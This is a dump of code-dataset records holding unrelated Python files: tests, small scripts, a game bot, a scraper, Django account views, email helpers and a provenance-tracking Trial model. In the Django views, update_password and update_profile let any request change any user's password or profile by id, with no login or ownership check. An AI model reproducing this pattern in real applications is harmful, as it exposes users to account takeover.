datebase - expiry date.\"),\n required=False,\n )\n\n moreexercise_expirydate = Date(\n title=_(u\"label_moreexercise_expirydate\",\n default=\"More exercise - expiry date.\"),\n required=False,\n )\n\n intelligent_practice_access = List(\n title=_(u\"label_intelligent_practice_access\",\n default=\"Intelligent practice access.\"),\n value_type = Choice(vocabulary=access_types),\n required=False,\n )\n \n subscribe_to_newsletter = Bool(\n title=_(u'label_subscribe_to_newsletter',\n default=u'Subscibe to newsletter.'),\n required=False,\n default=True,\n )\n\n\nclass UserDataSchemaProvider(object):\n implements(IUserDataSchemaProvider)\n\n def getSchema(self):\n return IEmasUserDataSchema\n","sub_path":"emas/theme/userdataschema.py","file_name":"userdataschema.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11273951","text":"from greent.graph_components import KNode\nfrom greent.synonymizers.oxo_synonymizer import synonymize\nfrom greent.conftest import rosetta\nfrom greent import node_types\n\ndef test_neuron(rosetta):\n node = KNode(\"CL:0000540\", type=node_types.CELL)\n synonymize(node,rosetta.core)\n assert len(node.synonyms) > 10\n #we're no longer so pathological about trying to get meshIDs so in this case we don't get one\n meshcell = node.get_synonyms_by_prefix(\"MESH\")\n assert len(meshcell) == 0\n #BUt we should get a UMLS\n umlscell = node.get_synonyms_by_prefix(\"UMLS\")\n mid = list(umlscell)[0]\n assert mid == 'UMLS:C0027882' \\\n\ndef test_phenotype(rosetta):\n node = KNode(\"MEDDRA:10014408\", type=node_types.PHENOTYPE)\n synonymize(node,rosetta.core)\n assert len(node.synonyms) > 10\n hpsyns = node.get_synonyms_by_prefix(\"HP\")\n assert len(hpsyns) > 0\n print(hpsyns)\n\ndef test_names(rosetta):\n node = KNode('HP:0002527', type=node_types.PHENOTYPE, name='Falls')\n synonymize(node,rosetta.core)\n print( node.synonyms )\n msyns = node.get_labeled_ids_by_prefix(\"MedDRA\")\n assert len(msyns) == 1\n ms = msyns.pop()\n assert ms.identifier == 'MedDRA:10016173'\n assert ms.label == 'Fall'\n\n","sub_path":"greent/test/test_oxo_synonmizer.py","file_name":"test_oxo_synonmizer.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433245662","text":"from AlbotOnline.Snake.SnakeGame import SnakeGame\nimport random\nimport time\n\ngame = SnakeGame() #Connects you to the Client\nturn = 0\n\ndef getOkeyMoves(simBoard):\n playerMoves, enemyMoves = game.getPossibleMoves(simBoard)\n newPlayerMoves = playerMoves[:]\n newEnemyMoves = enemyMoves[:]\n\n for move in playerMoves:\n simBoard = game.simulateMove(board, move, random.choice(enemyMoves))\n if(game.evaluateBoard(simBoard) == 'enemyWon' or game.evaluateBoard(simBoard) == 'draw'):\n newPlayerMoves.remove(move)\n\n for move in enemyMoves:\n simBoard = game.simulateMove(board, random.choice(playerMoves), move)\n\n if(game.evaluateBoard(simBoard) == 'playerWon' or game.evaluateBoard(simBoard) == 'draw' ):\n newEnemyMoves.remove(move)\n\n # if återvändsgränd\n if not newPlayerMoves:\n print(\"-----\")\n newPlayerMoves.append('down')\n\n\n if not newEnemyMoves:\n print(\"-----\")\n newPlayerMoves.append('down')\n\n # print(newEnemyMoves)\n # print(newPlayerMoves)\n\n return newPlayerMoves, newEnemyMoves\n\n\ndef PlayFullGame(simBoard):\n while(game.evaluateBoard(simBoard) == \"ongoing\"):\n playerMoves, enemyMoves = getOkeyMoves(simBoard)\n simBoard = game.simulateMove(simBoard, random.choice(playerMoves), random.choice(enemyMoves))\n return game.evaluateBoard(simBoard)\n\ndef MakePredictions(board, playerMoves, enemyMoves, thinkTime, stats):\n for j, move in enumerate(playerMoves):\n won = 0\n for _ in (range(thinkTime)):\n result = PlayFullGame(game.simulateMove(board, move, random.choice(enemyMoves)))\n if result == 'playerWon':\n won = won + 1\n stats[j] = stats[j] + won\n\n return stats\n\n#\nwhile(game.awaitNextGameState() == \"ongoing\"):\n print(\"-----------------------------\")\n start_time = time.time()\n turn_time = 0\n\n turn = turn + 1\n board = game.currentBoard\n thinkTime = 30\n\n numberOfSims = 0\n\n\n\n\n #Simulate games <<-\n playerMoves, enemyMoves = getOkeyMoves(board)\n game.makeMove(playerMoves[0])\n\n stats = []\n for i in playerMoves:\n stats.append(0)\n\n # start_time = time.time()\n # stats = MakePredictions(board, playerMoves, enemyMoves, thinkTime, stats)\n # best_move = playerMoves[stats.index(max(stats))]\n # game.makeMove(best_move)\n # end_time = time.time()\n #\n # numberOfSims = (thinkTime * 3) ##\n\n turn_time = time.time() - start_time\n\n while(turn_time < 2.8):\n #print(turn_time)\n #start_time = time.time()\n stats = MakePredictions(board, playerMoves[:], enemyMoves[:], int(1), stats)\n numberOfSims = numberOfSims + (3 * int(thinkTime/3))\n # print(\"Number of sims = \",numberOfSims)\n #print(\"Stats \", stats)\n best_move = playerMoves[stats.index(max(stats))]\n\n game.makeMove(best_move)\n #end_time = time.time()\n #print(end_time-start_time)\n turn_time = time.time() - start_time\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"236627223","text":"from bs4 import BeautifulSoup\nimport requests\n\nrequest = requests.get(\"https://www.empireonline.com/movies/features/best-movies-2/\")\ncontent = request.text\n\nsoup = BeautifulSoup(content, \"html.parser\")\n\nmovies_list_elem = soup.find_all(name=\"h3\", class_=\"jsx-4245974604\")\nprint(movies_list_elem)","sub_path":"Day 45/Final Project - 100 Top Movies Scraping/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324298523","text":"from typing import List, Dict, Any, Tuple\nfrom postal.parser import parse_address\nfrom transformers import Pipeline, pipeline\n\nfrom extractors.extracting_tasks import NERExtractingTask\n\n\nclass LocationExtractor(NERExtractingTask):\n model = 'xlm-roberta-large-finetuned-conll03-german'\n tokenizer = 'xlm-roberta-large-finetuned-conll03-german'\n type_mappings = {\n 'po_box': 'poBox',\n 'postcode': 'zip',\n 'house_number': 'street_house_number',\n 'road': 'street_road',\n 'unit': 'street2_unit',\n 'level': 'street2_level',\n 'staircase': 'street2_staircase',\n 'entrance': 'street2_entrance',\n 'house': 'street2_house',\n 'category': 'street2_category',\n 'near': 'street2_near',\n 'suburb': 'city_suburb',\n 'city_district': 'city_city_district',\n 'city': 'city_city',\n 'state': 'state',\n 'state_district': 'state',\n 'country': 'country'\n }\n\n def _extract(self):\n ner_pipeline: Pipeline = pipeline('ner', model=self.model, tokenizer=self.tokenizer, grouped_entities=True)\n extracted: List[Dict[str, Any]] = []\n\n for line_index, line in self.lines.items():\n entities = ner_pipeline(line)\n\n delete: List[int] = []\n\n for index in range(len(entities)):\n if entities[index]['score'] < 0.9:\n delete.append(index)\n\n for index in sorted(delete, reverse=True):\n del entities[index]\n\n print(line)\n print(entities)\n\n if any(entity.get('entity_group') == 'LOC' for entity in entities):\n locations: List[Tuple[str, str]] = parse_address(line)\n\n print(locations)\n\n for location in locations:\n if location[1] in self.type_mappings:\n extracted.append({\n 'type': self.type_mappings[location[1]],\n 'match': location[0],\n 'index': line_index\n })\n\n print(f'Locations: {extracted}')\n\n return extracted\n\n\nif __name__ == '__main__':\n le = LocationExtractor({1: 'P.O.Box 2000'})","sub_path":"extractors/location_extractor.py","file_name":"location_extractor.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"247048084","text":"class Solution:\n def partition(self, s):\n ans = []\n if not s: return ans\n def isPalindrome(s):\n return s == s[::-1]\n if isPalindrome(s): ans.append([s])\n for i in range(1, len(s)):\n ns = s[0:i]\n if isPalindrome(ns):\n tans = self.partition(s[i:])\n if len(tans) > 0:\n for each in tans:\n lll = [ns]\n lll.extend(each)\n ans.append(lll)\n return ans\n","sub_path":"algorithm/leetcode/problems/131-Palindrome-Partitioning.py","file_name":"131-Palindrome-Partitioning.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"114482316","text":"import webbrowser as web\nimport time\n\nurl = 'www.google.com'\n\ndef chrome(url):\n chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\n google= web.get(chrome_path)\n google.open(url)\n\ndef explore(url):\n ie= web.get(web.iexplore)\n ie.open(url)\n\nimport urllib.request\nfrom time import time\n\ndef aa():\n url = 'www.google.com'\n explore='C:/Program Files (x86)/Internet Explorer/iexplore.exe %s'\n stream= web.get(explore)\n start_time = time()\n stream.open(url)\n end_time = time()\n\n print(end_time-start_time)\n print(\"aa\",round(end_time-start_time, 3))\n#aa()\n\ndef bb():\n url = 'www.google.com'\n chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\n stream= web.get(chrome_path)\n dizi=[]\n for i in range(10):\n start_time = time()\n stream.open(url)\n end_time = time()\n dizi.append(round(end_time-start_time, 3))\n print(dizi)\n\nimport time\nfrom selenium import webdriver\ndef ddd():\n driver = webdriver.Chrome(executable_path=r\"C:\\Users\\Engin\\PycharmProjects\\untitled\\Yazılım Kalite\\chromedriver.exe\")\n start = time.time()\n driver.get('http://stackoverflow.com')\n end = time.time()\n print(end - start)\n driver.quit()\nddd()","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496375548","text":"import sys\nfrom Shell import Shell\n\ndef main(sysargv):\n shell = Shell()\n if sysargv[1] == 'shell':\n print(\n \"\"\"\n -init // initialize ***please start with this***\n -cr (=1 or 2) // create process \n -de // delete process \n -req <# of units> // request resource \n -rel <# of units> // release resource \n -to // time out \n -list // list all info\n -provide // provide info of a given process name\n -q // quit shell\n \"\"\"\n )\n while 1:\n argv = input('coldplay@COLDPLAY$')\n argv = argv.split(' ')\n shell.run(argv)\n elif sysargv[1] == 'test':\n shell.test('input.txt')\n\nif __name__ == '__main__':\n main(sys.argv)","sub_path":"操作系统实验/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"277897215","text":"from algo.forest.binary_tree_traversals import level_order\nfrom algo.forest.bst_check import create_valid_bst\nfrom algo.structures.binary_tree import BinaryTree\n\n\"\"\"\nGiven the root of a BST and 2 numbers min and max, trim the tree such that\nall the numbers in the new tree are between min and max (inclusive).\nThe resulting tree should still be a valid BST.\n\"\"\"\n\n\ndef trim_bst(root: BinaryTree, min_val, max_val):\n\n def post_order_and_trim(node):\n if not node:\n return\n\n node.left = post_order_and_trim(node.left)\n node.right = post_order_and_trim(node.right)\n\n if min_val <= node.key <= max_val:\n return node\n\n return node.right if node.key < min_val else node.left\n\n post_order_and_trim(root)\n return root\n\n\ntree = create_valid_bst()\n\nprint('before trim:')\nlevel_order(tree)\n\ntree = trim_bst(tree, 5, 13)\n\nprint('after trim:')\nlevel_order(tree)\n","sub_path":"algo-python/algo/forest/trim_bst.py","file_name":"trim_bst.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"620090489","text":"from django.shortcuts import render, get_object_or_404\nfrom . import forms\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout, views\nfrom .models import *\nfrom django.contrib.auth import logout\nfrom car_renting.models import Notification\n\n\n# this variable is created due to an error that settings has no \n# variable static url, (setting has a variable called STATIC_URL though)\n# for some reasons i did not have time to fix this is the teporary fix\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\n\n\ndef user_login(request):\n fresh_form = forms.LoginForm()\n if request.method == 'POST':\n form = forms.LoginForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n user = authenticate(\n username=data['email'], password=data['password'])\n if user is not None:\n if user.is_active:\n request.session['username'] = user.email\n login(request, user)\n return redirect('/car_renting/home')\n else:\n context = {\n 'with_status' : True,\n 'title': 'Failed!!',\n 'info' : 'account disabled',\n 'static_url': STATIC_URL,\n 'alert': 'alert-danger'\n }\n return render(request, 'login.html', context)\n else:\n context = {\n 'with_status' : True,\n 'title': 'Failed!!',\n 'info' : 'invalid user name or password',\n 'static_url': STATIC_URL,\n 'alert': 'alert-danger'\n }\n return render(request, 'login.html', context)\n else:\n context = {\n 'with_status' : True,\n 'title': 'Failed!!',\n 'info' : 'invaild data provided',\n 'static_url': STATIC_URL,\n 'alert': 'alert-danger'\n }\n return render(request, 'login.html', context)\n else:\n static_url = STATIC_URL\n\n # if user is authenticated bypass the login page\n if request.user.is_authenticated:\n return redirect('/car_renting/home')\n \n return render(request, 'login.html', {'form': fresh_form, 'static_url': static_url})\n\n\ndef user_logout(request):\n if request.user.is_authenticated:\n logout(request)\n return redirect('/login')\n else:\n return redirect('/login')\n\ndef user_registration(request):\n\n if request.method == 'POST':\n form = forms.RegisterForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_active = True\n user.set_password(form.cleaned_data['password2'])\n user.save()\n\n new_user = UserProfile(user=user)\n new_user.save()\n\n context = {\n 'with_status' : True,\n 'title': 'Success',\n 'info' : 'you have successfully registered',\n 'alert': 'alert-success',\n 'static_url': STATIC_URL\n }\n return render(request, 'Registration/register.html', context)\n else:\n context = {\n 'with_status' : True,\n 'title': 'Failed',\n 'info' : 'Invalid data provided, please check your input',\n 'static_url': STATIC_URL,\n 'alert': 'alert-danger'\n }\n return render(request, 'Registration/register.html', context)\n else:\n form = forms.RegisterForm()\n static_url = STATIC_URL\n return render(request, 'Registration/register.html', {\"form\": form, 'static_url': static_url})\n\n\ndef settings(request):\n if request.user.is_authenticated:\n if request.method == \"GET\":\n # check for unread notifications\n notifications = Notification.notifications.filter(target__id=request.user.id).order_by('-created_at')\n navbar_notifications = notifications.filter(is_viewed=False)\n\n context = {\n 'user': request.user,\n 'view_type': 'settings',\n 'navbar_notifications': navbar_notifications,\n\n 'media': MEDIA_URL,\n 'static_url': STATIC_URL,\n 'form': forms.UserProfileUpdateForm\n }\n return render(request, 'home.html', context)\n\n elif request.method == \"POST\":\n form = forms.UserUpdateForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('/settings')\n else:\n return redirect('/settings')\n else:\n return redirect('/login')\n\n\ndef update_password(request, id):\n\n if request.method == \"POST\":\n user = get_object_or_404(CustomUser, pk=id)\n form = forms.Newpassword(request.POST, instance=user)\n if form.is_valid():\n user.set_password(form.cleaned_data['password2'])\n user.save()\n return redirect('/settings')\n else:\n return redirect('/settings')\n\n\ndef update_profile(request, id):\n\n if request.method == \"POST\":\n profile = get_object_or_404(UserProfile, pk=id)\n form = forms.UserProfileUpdateForm(request.POST, request.FILES, instance=profile)\n if form.is_valid():\n form.save()\n return redirect('/settings')\n else:\n print(form.data)\n return redirect('/settings')","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288708476","text":"import pyautogui as p\nimport time\n\ntry:\n\twhile True:\n\t\tx,y = p.position()\n\t\tpositionStr = 'X: ' + str(x).rjust(4) + 'Y: ' + str(y).rjust(4)\n\t\tprint(positionStr, end='')\n\t\tprint('\\b'* len(positionStr), end='', flush=True)\nexcept KeyboardInterrupt:\n\tprint(\"\\n Done!\")","sub_path":"moseNow.py","file_name":"moseNow.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"547403720","text":"import smtplib\nfrom jinja2 import Environment, PackageLoader\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import COMMASPACE, make_msgid\nfrom odybcl2fastq import config\n\n\ndef generateMessageId():\n '''\n Creates a unique message id for the email message\n '''\n return make_msgid()\n\ndef composeMessage(message, subject, summary_data, fromaddr, toemaillist, template, ccemaillist=[], bccemaillist=[]):\n msg = MIMEMultipart()\n msg['Message-ID'] = generateMessageId()\n msg['From'] = fromaddr\n msg['To'] = COMMASPACE.join(toemaillist)\n msg['Subject'] = subject\n if len(ccemaillist) > 0:\n msg['Cc'] = COMMASPACE.join(ccemaillist)\n if len(bccemaillist) > 0:\n msg['Bcc'] = COMMASPACE.join(bccemaillist)\n if summary_data:\n html = get_html(summary_data, template)\n msg.attach(MIMEText(html, 'html'))\n else:\n if len(message) > 900000:\n message = message[-900000:]\n msg.attach(MIMEText(message, 'plain'))\n return msg\n\ndef buildmessage(message, subject, summary_data, fromaddr, toemaillist, template='summary.html', ccemaillist=[], bccemaillist=[], server=None):\n if not server:\n server = config.EMAIL['smtp']\n msg = composeMessage(message, subject, summary_data, fromaddr, toemaillist, template, ccemaillist=[], bccemaillist=[])\n emails = toemaillist + ccemaillist + bccemaillist\n smtp = smtplib.SMTP(server)\n success = smtp.sendmail(fromaddr, emails, msg.as_string())\n smtp.close()\n return success\n\n\ndef get_html(summary_data, template):\n # create html message with jinja\n j2_env = Environment(\n loader=PackageLoader('odybcl2fastq', 'templates'),\n trim_blocks=True\n )\n html = j2_env.get_template(template).render(summary_data)\n return html\n","sub_path":"odybcl2fastq/emailbuilder/emailbuilder.py","file_name":"emailbuilder.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139959524","text":"# Copyright (c) 2014 Universidade Federal Fluminense (UFF)\n# Copyright (c) 2014 Polytechnic Institute of New York University.\n# This file is part of noWorkflow.\n# Please, consult the license terms in the LICENSE file.\n\nfrom __future__ import (absolute_import, print_function,\n division, unicode_literals)\n\nimport sys\nfrom datetime import datetime\nfrom collections import defaultdict, OrderedDict, Counter\n\nfrom .. import utils\nfrom ..persistence import row_to_dict, persistence\nfrom .trial_activation_visitors import TrialGraphVisitor\nfrom .trial_activation_visitors import TrialGraphCombineVisitor\nfrom .trial_prolog import TrialProlog\nfrom .utils import calculate_duration, FORMAT\nfrom .activation import Activation\n\nclass Trial(object):\n \"\"\" This model represents a trial\n Initialize it by passing the trial id:\n trial = Trial(2)\n\n There are two visualization modes for the graph:\n exact match: calls are only combined when all the sub-call match\n trial.graph_type = 0\n combined: calls are combined without considering the sub-calls\n trial.graph_type = 1\n\n You can change the graph width and height by the variables:\n trial.graph_width = 600\n trial.graph_height = 400\n \"\"\"\n\n def __init__(self, trial_id, script=None, exit=False):\n if exit:\n last_trial_id = persistence.last_trial_id(script=script)\n trial_id = trial_id or last_trial_id\n if not 1 <= trial_id <= last_trial_id:\n utils.print_msg('inexistent trial id', True)\n sys.exit(1)\n\n self.id = trial_id\n self._info = None\n self.prolog = None\n self._graph_types = {\n 0: self.independent_activation_graph,\n 1: self.combined_activation_graph\n }\n self.graph_width = 500\n self.graph_height = 500\n self.graph_type = 0\n\n def init_prolog(self):\n # Todo: fix prolog\n if not self.prolog:\n from pyswip import Prolog\n self.prolog = Prolog()\n self.trial_prolog = TrialProlog(self)\n for fact in self.trial_prolog.export_facts(with_doc=False):\n self.prolog.assertz(fact[:-1])\n for rule in self.trial_prolog.export_rules().split('\\n'):\n rule = rule.strip()\n if not rule or rule[0] == '%':\n continue\n self.prolog.assertz(rule[:-1])\n\n def query(self, prolog):\n self.init_prolog()\n return self.prolog.query(prolog)\n\n def prolog_rules(self):\n self.init_prolog()\n return self.trial_prolog.export_rules().split('\\n')\n\n @property\n def trial_id(self):\n from warnings import warn\n warn('trial_id propery deprecated. Please use id')\n return self.id\n\n @property\n def script(self):\n \"\"\" Returns the \"main\" script of the trial \"\"\"\n info = self.info()\n return info['script']\n\n @property\n def code_hash(self):\n \"\"\" Returns the hash code of the main script \"\"\"\n info = self.info()\n return info['code_hash']\n\n def _ipython_display_(self):\n \"\"\" Displays d3 graph on ipython notebook \"\"\"\n from IPython.display import (\n display_png, display_html, display_latex,\n display_javascript, display_svg\n )\n import json\n import time\n\n uid = str(int(time.time()*1000000))\n display_html(\"\"\"\n
\n
\n
\n \n \n
\n
\n
\n
\"\"\".format(uid, self.graph_width, self.graph_height), raw=True)\n display_javascript(\"\"\"\n var trial_graph = now_trial_graph('#graph-{0}', {0}, {2}, {2}, {1}, {3}, {4}, \"#showtooltips-{0}\", {{\n custom_size: function() {{\n return [{3}, {4}];\n }}\n }});\n $( \"[name='showtooltips']\" ).change(function() {{\n trial_graph.set_use_tooltip(d3.select(\"#showtooltips-{0}\").property(\"checked\"));\n }});\n \"\"\".format(\n uid,\n json.dumps(self._graph_types[self.graph_type]()),\n self.id, self.graph_width, self.graph_height), raw=True)\n\n def info(self):\n \"\"\" Returns dict with the trial information, considering the duration \"\"\"\n if self._info is None:\n self._info = row_to_dict(\n persistence.load_trial(self.id).fetchone())\n if self._info['finish']:\n self._info['duration'] = calculate_duration(self._info)\n return self._info\n\n def function_defs(self):\n \"\"\" Returns a dict of function definitions \"\"\"\n return {\n function['name']: row_to_dict(function)\n for function in persistence.load('function_def',\n trial_id=self.id)\n }\n\n def head_trial(self, remove=False):\n \"\"\" Returns the parent trial object \"\"\"\n parent_id = persistence.load_parent_id(self.script, remove=remove)\n return Trial(parent_id)\n\n def modules(self, map_fn=row_to_dict):\n \"\"\" Returns the modules imported during the trial\n The first element is a list of local modules\n The second element is a list of external modules\n \"\"\"\n dependencies = persistence.load_dependencies(self.id)\n result = map(map_fn, dependencies)\n local = [dep for dep in result\n if dep['path'] and persistence.base_path in dep['path']]\n return local, result\n\n def environment(self):\n \"\"\" Returns a dict of environment variables \"\"\"\n return {\n attr['name']: attr['value'] for attr in map(row_to_dict,\n persistence.load('environment_attr', trial_id=self.id))\n }\n\n def file_accesses(self):\n \"\"\" Returns a list of file accesses \"\"\"\n file_accesses = persistence.load('file_access',\n trial_id=self.id)\n\n result = []\n for fa in map(row_to_dict, file_accesses):\n stack = []\n function_activation = next(iter(self.activations(\n id=fa['function_activation_id'])))\n while function_activation:\n function_name = function_activation['name']\n try:\n function_activation = next(iter(self.activations(\n id=function_activation['caller_id'])))\n stack.insert(0, function_name)\n except StopIteration:\n function_activation = None\n if not stack or stack[-1] != 'open':\n stack.append(' ... -> open')\n\n result.append({\n 'id': fa['id'],\n 'function_activation_id': fa['function_activation_id'],\n 'name': fa['name'],\n 'mode': fa['mode'],\n 'buffering': fa['buffering'],\n 'content_hash_before': fa['content_hash_before'],\n 'content_hash_after': fa['content_hash_after'],\n 'timestamp': fa['timestamp'],\n 'stack': ' -> '.join(stack),\n })\n return result\n\n def activations(self, **conditions):\n \"\"\" Returns a list of activations \"\"\"\n return map(Activation, persistence.load('function_activation',\n trial_id=self.id,\n order='start',\n **conditions))\n\n def slicing_variables(self):\n \"\"\" Returns a list of slicing variables \"\"\"\n return persistence.load('slicing_variable',\n trial_id=self.id,\n order='vid ASC')\n\n def slicing_usages(self):\n \"\"\" Returns a list of slicing usages \"\"\"\n return persistence.load('slicing_usage',\n trial_id=self.id)\n\n def slicing_dependencies(self):\n \"\"\" Returns a list of slicing dependencies \"\"\"\n return persistence.load('slicing_dependency',\n trial_id=self.id)\n\n def activation_graph(self):\n \"\"\" Generates an activation graph \"\"\"\n result_stack = []\n stack = [Single(act) for act in self.activations()]\n\n if not stack:\n return TreeElement()\n\n result_stack.append(stack.pop())\n while stack:\n next = result_stack.pop()\n previous = stack.pop()\n add_flow(stack, result_stack, previous, next)\n\n return result_stack.pop()\n\n def independent_activation_graph(self):\n \"\"\" Generates an activation graph and transforms it into an\n exact match graph supported by d3 \"\"\"\n graph = self.activation_graph()\n visitor = TrialGraphVisitor()\n graph.visit(visitor)\n return visitor.to_dict()\n\n def combined_activation_graph(self):\n \"\"\" Generates an activation graph and transforms it into an\n combined graph supported by d3 \"\"\"\n graph = self.activation_graph()\n visitor = TrialGraphCombineVisitor()\n graph.visit(visitor)\n return visitor.to_dict()\n\n\nclass TreeElement(object):\n\n def __init__(self):\n self.duration = 0\n self.count = 1\n self.repr = \"\"\n\n def mean(self):\n if isinstance(self.duration, tuple):\n return (self.a.duration / self.a.count,\n self.b.duration / self.b.count)\n return self.duration / self.count\n\n def visit(self, visitor):\n return visitor.visit_default(self)\n\n def calculate_repr(self):\n pass\n\n def mix(self, other):\n pass\n\n def __hash__(self):\n #return id(self)\n return hash(self.__repr__())\n\n def __repr__(self):\n return self.repr\n\n\nclass Single(TreeElement):\n\n def __init__(self, activation):\n self.activation = activation\n self.activations = {activation}\n self.parent = activation['caller_id']\n self.id = activation['id']\n self.line = activation['line']\n self.name = activation['name']\n self.trial_id = activation['trial_id']\n self.repr = \"S({0}-{1})\".format(self.line, self.name)\n\n @property\n def count(self):\n return sum(1 for a in self.activations)\n\n @count.setter\n def count(self, value):\n pass\n\n @property\n def duration(self):\n return sum(calculate_duration(a) for a in self.activations\n if a['finish'] and a['start'])\n\n @duration.setter\n def duration(self, value):\n pass\n\n def mix(self, other):\n self.count += other.count\n self.duration += other.duration\n self.activations = self.activations.union(other.activations)\n\n def __eq__(self, other):\n if type(self) != type(other):\n return False\n if self.line != other.line:\n return False\n if self.name != other.name:\n return False\n return True\n\n def name_id(self):\n return \"{0} {1}\".format(self.line, self.name)\n\n def visit(self, visitor):\n return visitor.visit_single(self)\n\n def to_dict(self, nid):\n return {\n 'index': nid,\n 'caller_id': self.parent,\n 'name': self.name,\n 'node': {\n 'trial_id': self.trial_id,\n 'line': self.line,\n 'count': self.count,\n 'duration': self.duration,\n 'info': Info(self)\n }\n }\n\n\nclass Mixed(TreeElement):\n\n def __init__(self, activation):\n self.duration = activation.duration\n self.elements = [activation]\n self.parent = activation.parent\n self.id = activation.id\n self.repr = activation.repr\n\n @property\n def count(self):\n return sum(e.count for e in self.elements)\n\n @count.setter\n def count(self, value):\n pass\n\n @property\n def duration(self):\n return sum(e.duration for e in self.elements)\n\n @property\n def first(self):\n return next(iter(self.elements))\n\n @duration.setter\n def duration(self, value):\n pass\n\n def add_element(self, element):\n self.elements.append(element)\n\n def visit(self, visitor):\n return visitor.visit_mixed(self)\n\n def mix(self, other):\n self.elements += other.elements\n self.mix_results()\n\n def mix_results(self):\n it = iter(self.elements)\n initial = next(it)\n for element in it:\n initial.mix(element)\n\n\nclass Group(TreeElement):\n\n def __init__(self):\n self.nodes = OrderedDict()\n self.edges = OrderedDict()\n self.duration = 0\n self.parent = None\n self.count = 1\n self.repr = \"\"\n\n def initialize(self, previous, next):\n self.nodes[next] = Mixed(next)\n self.duration = next.duration\n self.next = next\n self.last = next\n self.add_subelement(previous)\n self.parent = next.parent\n return self\n\n def add_subelement(self, previous):\n next, self.next = self.next, previous\n if not previous in self.edges:\n self.edges[previous] = utils.OrderedCounter()\n if not previous in self.nodes:\n self.nodes[previous] = Mixed(previous)\n else:\n self.nodes[previous].add_element(previous)\n self.edges[previous][next] += 1\n\n def calculate_repr(self):\n result = [\n \"[{0}-{1}->{2}]\".format(previous, count, next)\n for previous, edges in self.edges.items()\n for next, count in edges.items()\n ]\n\n self.repr = \"G({0})\".format(', '.join(result))\n\n def __eq__(self, other):\n if type(self) != type(other):\n return False\n if not self.edges == other.edges:\n return False\n return True\n\n def visit(self, visitor):\n return visitor.visit_group(self)\n\n def mix(self, other):\n for node, value in self.nodes.items():\n value.mix(other.nodes[node])\n\n\nclass Call(TreeElement):\n\n def __init__(self, caller, called):\n self.caller = caller\n self.called = called\n self.called.calculate_repr()\n self.parent = caller.parent\n self.count = 1\n self.id = self.caller.id\n self.duration = self.caller.duration\n self.repr = 'C({0}, {1})'.format(self.caller, self.called)\n\n def __eq__(self, other):\n if type(self) != type(other):\n return False\n if not self.caller == other.caller:\n return False\n if not self.called == other.called:\n return False\n return True\n\n def visit(self, visitor):\n return visitor.visit_call(self)\n\n def mix(self, other):\n self.caller.mix(other.caller)\n self.called.mix(other.called)\n\n\nclass Info(object):\n\n def __init__(self, single):\n self.title = (\"Trial {trial}
\"\n \"Function {name} called at line {line}\").format(\n trial=single.trial_id, name=single.name, line=single.line)\n self.activations = set()\n self.duration = \"\"\n self.mean = \"\"\n self.extract_activations(single)\n\n def update_by_node(self, node):\n self.duration = self.duration_text(node['duration'], node['count'])\n self.mean = self.mean_text(node['mean'])\n self.activation_list = sorted(self.activations, key=lambda a: a[0])\n\n def add_activation(self, activation):\n self.activations.add(\n (datetime.strptime(activation['start'], FORMAT), activation))\n\n def extract_activations(self, single):\n for activation in single.activations:\n self.add_activation(activation)\n\n def duration_text(self, duration, count):\n return \"Total duration: {} microseconds for {} activations\".format(\n duration, count)\n\n def mean_text(self, mean):\n return \"Mean: {} microseconds per activation\".format(mean)\n\n def activation_text(self, activation):\n values = map(row_to_dict, persistence.load('object_value',\n function_activation_id=activation['id'], order='id'))\n values = [value for value in values if value['type'] == 'ARGUMENT']\n result = [\n \"\",\n \"Activation #{id} from {start} to {finish} ({dur} microseconds)\"\n .format(dur=calculate_duration(activation), **activation),\n ]\n if values:\n result.append(\"Arguments: {}\".format(\n \", \".join(\"{}={}\".format(value[\"name\"], value[\"value\"])\n for value in values)))\n return result + [\n \"Returned {}\".format(activation['return'])\n ]\n\n def __repr__(self):\n result = [self.title, self.duration, self.mean]\n for activation in self.activation_list:\n result += self.activation_text(activation[1])\n\n return '
